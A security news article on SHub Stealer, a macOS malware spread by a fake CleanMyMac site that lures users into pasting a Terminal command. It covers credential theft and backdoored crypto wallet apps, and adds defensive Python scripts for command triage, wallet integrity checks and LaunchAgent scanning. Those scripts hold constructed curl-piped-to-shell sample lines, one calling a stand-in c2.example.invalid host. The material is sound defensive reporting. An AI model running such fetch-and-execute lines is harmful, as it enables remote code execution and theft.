Security researchers have uncovered SHub Stealer, a macOS malware distributed through a fake CleanMyMac website that tricks users into running a malicious Terminal command. The malware steals passwords, browser data and cryptocurrency wallet credentials while secretly backdooring popular wallet applications.

Fake CleanMyMac Site Spreads ‘SHub Stealer,’ Targeting Crypto Wallets On MacOS

The420 Web Desk

A malicious website posing as the popular Mac utility CleanMyMac is distributing a sophisticated macOS infostealer that harvests passwords, browser data and cryptocurrency wallet credentials. Security researchers say the malware, known as SHub Stealer, also installs hidden backdoors in crypto wallet applications to continuously siphon sensitive data.

A Deceptive Website Delivering Malware

A convincing fake website impersonating the well-known Mac utility CleanMyMac is actively distributing a dangerous macOS malware known as SHub Stealer, according to cybersecurity researchers. The site, hosted at cleanmymacos[.]org, has no affiliation with the legitimate CleanMyMac software or its developer, MacPaw.

The malware campaign relies on a social-engineering technique known as ClickFix, which manipulates visitors into opening the macOS Terminal and pasting what appears to be a legitimate installation command. In reality, the command initiates a hidden download and execution of malicious code.

The command itself is designed to appear credible. It prints a fake MacPaw link to create the illusion of legitimacy, decodes a concealed base64-encoded URL that masks the true destination, and then downloads and runs a malicious shell script from the attacker’s server.

Because the victim runs the command by hand, the macOS protections that guard downloaded software offer little resistance. Gatekeeper, notarization checks and XProtect's on-open scan are triggered by the quarantine attribute that browsers attach to downloaded files; a script fetched with curl and piped straight into a shell never receives that attribute, so those checks are never consulted. The malware then installs itself silently on the system.
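A triage helper for the kind of pasted command the article describes, added here as an example (it is not Malwarebytes' tooling and does not reproduce the real SHub command). It decodes any base64 token that hides a URL, spots a decoy link printed with echo, and flags the fetch-and-pipe-to-shell chain. The sample command, its hidden URL and the `example.invalid` domain are constructed for the demonstration; `macpaw.com` appears only as the decoy text a victim would be shown.

```python
import base64
import re
from dataclasses import dataclass, field

# A base64 run long enough to carry a URL; trailing '=' padding is optional.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Output piped straight into a shell, or a command substitution handed to sh -c.
_PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|k)?sh\b|\b(?:ba|z)?sh\s+-c\s+['\"]?\$\(")
_FETCH = re.compile(r"\b(?:curl|wget)\b")
# A plaintext URL printed with echo: the decoy the victim is meant to trust.
_DECOY = re.compile(r"echo\s+['\"]?([^'\";|&]*https?://[^\s'\"]+)")

HIDDEN_URL = "https://installer.example.invalid/setup.sh"  # constructed, not a real indicator
# Constructed sample with the shape the article describes: a printed decoy link,
# a base64 blob hiding the real download URL, and curl output piped into bash.
SAMPLE_COMMAND = (
    'echo "Installing from https://macpaw.com/cleanmymac"; '
    f'curl -fsSL "$(echo {base64.b64encode(HIDDEN_URL.encode()).decode()} | base64 -d)" | bash'
)


@dataclass
class Verdict:
    decoded_urls: list = field(default_factory=list)
    decoy_text: list = field(default_factory=list)
    pipes_to_shell: bool = False
    fetches_remote: bool = False

    @property
    def suspicious(self) -> bool:
        # Remote content handed straight to an interpreter, obfuscated or not.
        return self.fetches_remote and self.pipes_to_shell

    @property
    def obfuscated(self) -> bool:
        # The ClickFix refinement: the real destination only exists after decoding.
        return bool(self.decoded_urls)


def decode_hidden_urls(cmd: str) -> list:
    """Decode every base64-looking token in cmd and keep those that are URLs."""
    urls = []
    for tok in _B64_TOKEN.findall(cmd):
        padded = tok + "=" * (-len(tok) % 4)  # tolerate stripped padding
        try:
            text = base64.b64decode(padded, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # random alphanumerics that happen to look like base64
        if text.isprintable() and text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def analyze_command(cmd: str) -> Verdict:
    """Classify a single pasted shell command."""
    return Verdict(
        decoded_urls=decode_hidden_urls(cmd),
        decoy_text=_DECOY.findall(cmd),
        pipes_to_shell=bool(_PIPE_TO_SHELL.search(cmd)),
        fetches_remote=bool(_FETCH.search(cmd)),
    )


if __name__ == "__main__":
    v = analyze_command(SAMPLE_COMMAND)
    print("suspicious:", v.suspicious, "obfuscated:", v.obfuscated)
    print("decoy shown to the user:", v.decoy_text)
    print("real download URL(s):", v.decoded_urls)
```

The same logic can be run over `~/.zsh_history` or `~/.bash_history` line by line after a suspected ClickFix incident, which is the quickest way to recover the real download URL the victim executed.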


Data Harvesting and Command-and-Control Infrastructure

Once installed, SHub Stealer begins harvesting a wide range of sensitive data. Researchers say the malware collects saved passwords, browser information, Apple Keychain contents, cryptocurrency wallet files and Telegram session data.

Machines infected by the malware transmit identifying details — including IP address, macOS version and hostname — to a command-and-control server located at res2erch-sl0ut[.]com.

Security analysts note that SHub belongs to a broader family of AppleScript-based macOS infostealers, a category that also includes malware strains such as MacSync Stealer and Odyssey Stealer.

Researchers also identified a geofencing feature embedded in the malware. Before executing its primary payload, a loader script checks whether the infected machine has a Russian-language keyboard installed. If it does, the malware signals the attacker’s server with a “cis_blocked” event and exits without collecting data.

This behavior is commonly seen in malware associated with Russian-speaking cybercriminal groups, which often avoid infecting systems located within Commonwealth of Independent States countries to reduce the risk of attention from local authorities.

Backdooring Cryptocurrency Wallet Applications

What distinguishes SHub Stealer from related malware families, researchers say, is its ability to modify installed cryptocurrency wallet applications.

If the malware detects certain wallet programs on the infected Mac, it silently replaces critical application files with modified versions that continue to function normally while secretly transmitting sensitive data to the attacker.

The five confirmed targets are Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite, all of which are desktop applications built using the Electron framework.

Electron-based applications store the bulk of their JavaScript application logic inside an archive named app.asar. SHub terminates the running wallet application, downloads a modified version of this file from its command-and-control infrastructure, overwrites the original and then re-signs the application so that the altered bundle still passes macOS signature validation. Unless the attacker holds the vendor's signing key, that replacement signature cannot carry the original developer's identity, which is the detail an inspection of the bundle's signer can catch.

The modified applications continue to operate normally from the user’s perspective but secretly extract credentials in the background.

In the case of Exodus and Atomic Wallet, the malware sends the user’s wallet password and seed phrase to the endpoint wallets-gate[.]io/api/injection each time the wallet is unlocked.
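An integrity check for the app.asar swap described above, added here as an example rather than code from Malwarebytes or any wallet vendor. It records SHA-256 hashes of each wallet's app.asar on a known-clean system, compares them later, and reports the bundle's signer from `codesign -dvv` output because a re-signed bundle still verifies and only the signing identity (ad hoc, or a different team) gives the tampering away. The install paths under /Applications and the Contents/Resources/app.asar location are assumptions about where these Electron apps keep the archive; `demo_tampered_bundle` builds a constructed throwaway bundle so the check can be exercised off macOS.

```python
import hashlib
import json
import shutil
import subprocess
import tempfile
from pathlib import Path

# Assumed install paths of the five wallets the report names.
WALLET_BUNDLES = [
    "/Applications/Exodus.app",
    "/Applications/Atomic Wallet.app",
    "/Applications/Ledger Wallet.app",
    "/Applications/Ledger Live.app",
    "/Applications/Trezor Suite.app",
]
# Conventional location of the archive in an Electron bundle (assumption for these apps).
ASAR_RELATIVE = Path("Contents/Resources/app.asar")


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_codesign_info(text: str) -> dict:
    """Extract signer details from `codesign -dvv` output (codesign prints them to stderr)."""
    info = {"adhoc": False, "team": None, "authority": []}
    for line in text.splitlines():
        line = line.strip()
        if line == "Signature=adhoc":
            info["adhoc"] = True
        elif line.startswith("TeamIdentifier="):
            tid = line.split("=", 1)[1]
            info["team"] = None if tid == "not set" else tid
        elif line.startswith("Authority="):
            info["authority"].append(line.split("=", 1)[1])
    return info


def codesign_info(bundle: Path):
    """Return the bundle's signer details, or None when codesign is unavailable (non-macOS)."""
    if shutil.which("codesign") is None:
        return None
    r = subprocess.run(["codesign", "-dvv", str(bundle)], capture_output=True, text=True)
    return parse_codesign_info(r.stderr)


def check_bundle(bundle: Path, baseline: dict) -> dict:
    """Compare app.asar with the recorded hash. The signer is reported, not trusted:
    a bundle SHub has re-signed passes `codesign --verify` just fine."""
    asar = bundle / ASAR_RELATIVE
    result = {"bundle": bundle.name, "status": "missing", "sha256": None, "signer": None}
    if not asar.is_file():
        return result
    result["sha256"] = sha256_file(asar)
    expected = baseline.get(bundle.name)
    result["status"] = ("no-baseline" if expected is None
                        else "match" if expected == result["sha256"] else "MODIFIED")
    result["signer"] = codesign_info(bundle)
    return result


def record_baseline(bundles, baseline_path: Path) -> dict:
    """Run once on a known-clean system; stores bundle name -> sha256 of its app.asar."""
    baseline = {}
    for b in map(Path, bundles):
        if (b / ASAR_RELATIVE).is_file():
            baseline[b.name] = sha256_file(b / ASAR_RELATIVE)
    baseline_path.write_text(json.dumps(baseline, indent=2))
    return baseline


def audit(bundles, baseline_path: Path) -> list:
    baseline = json.loads(baseline_path.read_text()) if baseline_path.is_file() else {}
    return [check_bundle(Path(b), baseline) for b in bundles]


def demo_tampered_bundle() -> tuple:
    """Constructed fixture: a throwaway bundle whose app.asar is overwritten after the
    baseline is taken, as SHub does. Returns the status before and after the swap."""
    with tempfile.TemporaryDirectory() as tmp:
        bundle = Path(tmp) / "Exodus.app"
        asar = bundle / ASAR_RELATIVE
        asar.parent.mkdir(parents=True)
        asar.write_bytes(b"original archive bytes")
        baseline_path = Path(tmp) / "baseline.json"
        record_baseline([bundle], baseline_path)
        before = audit([bundle], baseline_path)[0]["status"]
        asar.write_bytes(b"backdoored archive bytes")
        after = audit([bundle], baseline_path)[0]["status"]
    return before, after


if __name__ == "__main__":
    print("fixture:", demo_tampered_bundle())
    for r in audit(WALLET_BUNDLES, Path.home() / ".wallet_asar_baseline.json"):
        print(f"{r['status']:<12} {r['bundle']:<20} signer={r['signer']}")
```

Take the baseline immediately after a fresh install and again after every legitimate update, since each update changes app.asar. A `MODIFIED` result with an ad-hoc signature, or a team identifier that differs from the one recorded at install time, is the combination to treat as a compromise.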

Fake Interfaces and Persistent Access

The malware employs additional deception techniques to extract sensitive recovery information from users of other wallets. For Ledger Wallet and Ledger Live, SHub disables TLS validation at startup and presents a fake recovery interface that prompts the user to enter their seed phrase. The information is then transmitted to the same attacker-controlled endpoint.

For Trezor Suite, the malware displays a full-screen overlay designed to replicate the wallet’s legitimate interface. The overlay presents a fabricated security update message requesting the seed phrase. The phrase is validated locally using the application’s own BIP39 library before being sent to the attacker.

To maintain long-term access to the compromised system, SHub installs a background task disguised as a legitimate Google component. The malware creates a file named com.google.keystone.agent.plist in the directory ~/Library/LaunchAgents/, impersonating Google’s Keystone updater.

The task runs every sixty seconds, allowing the attacker to execute remote commands on the infected machine. Researchers also observed that all five compromised wallet applications transmit stolen data to the same endpoint — wallets-gate[.]io — using identical API keys and build identifiers, suggesting the activity is controlled by a single operator.

Security analysts say users who executed the malicious command should inspect their systems for the LaunchAgent file and remove suspicious components. They also advise anyone who had cryptocurrency wallets installed at the time of infection to treat their recovery seed phrases as compromised and transfer funds to a new wallet created on a clean device. The findings were reported by researchers at Malwarebytes, who analyzed the full attack chain behind the campaign.
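A LaunchAgent triage script for the persistence described above, added here as an example and not Malwarebytes' tooling. It flags a plist carrying the `com.google.keystone.agent` label whose program is not Google's updater, a job that launches a shell interpreter, arguments that fetch or decode remote content, and a 60-second StartInterval. The location of the legitimate Keystone agent under `~/Library/Google/GoogleSoftwareUpdate` is stated as an assumption, and `demo_scan` builds constructed fixtures in a temporary directory so the logic can be exercised on any system.

```python
import plistlib
import tempfile
from pathlib import Path

SUSPECT_LABEL = "com.google.keystone.agent"
# Assumption: the real Keystone agent's program lives under this per-user directory.
LEGIT_KEYSTONE_DIR = "Library/Google/GoogleSoftwareUpdate"
SHELL_NAMES = {"sh", "bash", "zsh", "ksh", "osascript"}
FETCH_WORDS = ("curl", "wget", "base64", "http://", "https://")


def triage_plist(path: Path) -> dict:
    """Score one LaunchAgent plist; `findings` is empty when nothing looks wrong."""
    with path.open("rb") as f:
        plist = plistlib.load(f)
    args = list(plist.get("ProgramArguments") or [])
    if not args and "Program" in plist:
        args = [plist["Program"]]
    joined = " ".join(str(a) for a in args)
    label = plist.get("Label", "")
    findings = []
    if label == SUSPECT_LABEL and LEGIT_KEYSTONE_DIR not in joined:
        findings.append("Keystone label but the program is not Google's updater")
    if args and Path(args[0]).name in SHELL_NAMES:
        findings.append(f"launches a shell interpreter: {args[0]}")
    if any(w in joined for w in FETCH_WORDS):
        findings.append("arguments download or decode remote content")
    interval = plist.get("StartInterval")
    if isinstance(interval, int) and interval <= 60:
        findings.append(f"StartInterval={interval}s (beacon-style polling)")
    return {"path": str(path), "label": label, "program": joined, "findings": findings}


def scan_launch_agents(directory: Path) -> list:
    """Triage every plist in directory and return only those with at least one finding."""
    hits = []
    for p in sorted(directory.glob("*.plist")):
        r = triage_plist(p)
        if r["findings"]:
            hits.append(r)
    return hits


def demo_scan() -> list:
    """Constructed fixtures: one plist shaped like the persistence the report describes,
    one shaped like a legitimate Keystone agent (assumption), one unrelated benign job."""
    fake = {
        "Label": SUSPECT_LABEL,
        "ProgramArguments": ["/bin/sh", "-c", "curl -fsSL https://c2.example.invalid/t | sh"],
        "StartInterval": 60,
        "RunAtLoad": True,
    }
    legit_like = {
        "Label": SUSPECT_LABEL,
        "ProgramArguments": ["/Users/alice/Library/Google/GoogleSoftwareUpdate/"
                             "GoogleSoftwareUpdate.bundle/Contents/Resources/"
                             "GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent"],
        "StartInterval": 3600,
    }
    benign = {"Label": "com.example.backup", "Program": "/usr/local/bin/backup", "StartInterval": 86400}
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        for name, content in [("com.google.keystone.agent.plist", fake),
                              ("keystone-legit-like.plist", legit_like),
                              ("com.example.backup.plist", benign)]:
            with (d / name).open("wb") as f:
                plistlib.dump(content, f)
        return scan_launch_agents(d)


if __name__ == "__main__":
    for r in demo_scan() + scan_launch_agents(Path.home() / "Library/LaunchAgents"):
        print(r["path"], r["label"])
        for finding in r["findings"]:
            print("   -", finding)
```

Run it against `~/Library/LaunchAgents` as the affected user, and extend the directory list to `/Library/LaunchAgents` and `/Library/LaunchDaemons` on a full sweep. For a confirmed hit, unload the job with `launchctl bootout gui/$(id -u) <plist path>`, then delete both the plist and the program or script it points at; the label alone says nothing, since the file name is chosen to match a real Google component.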
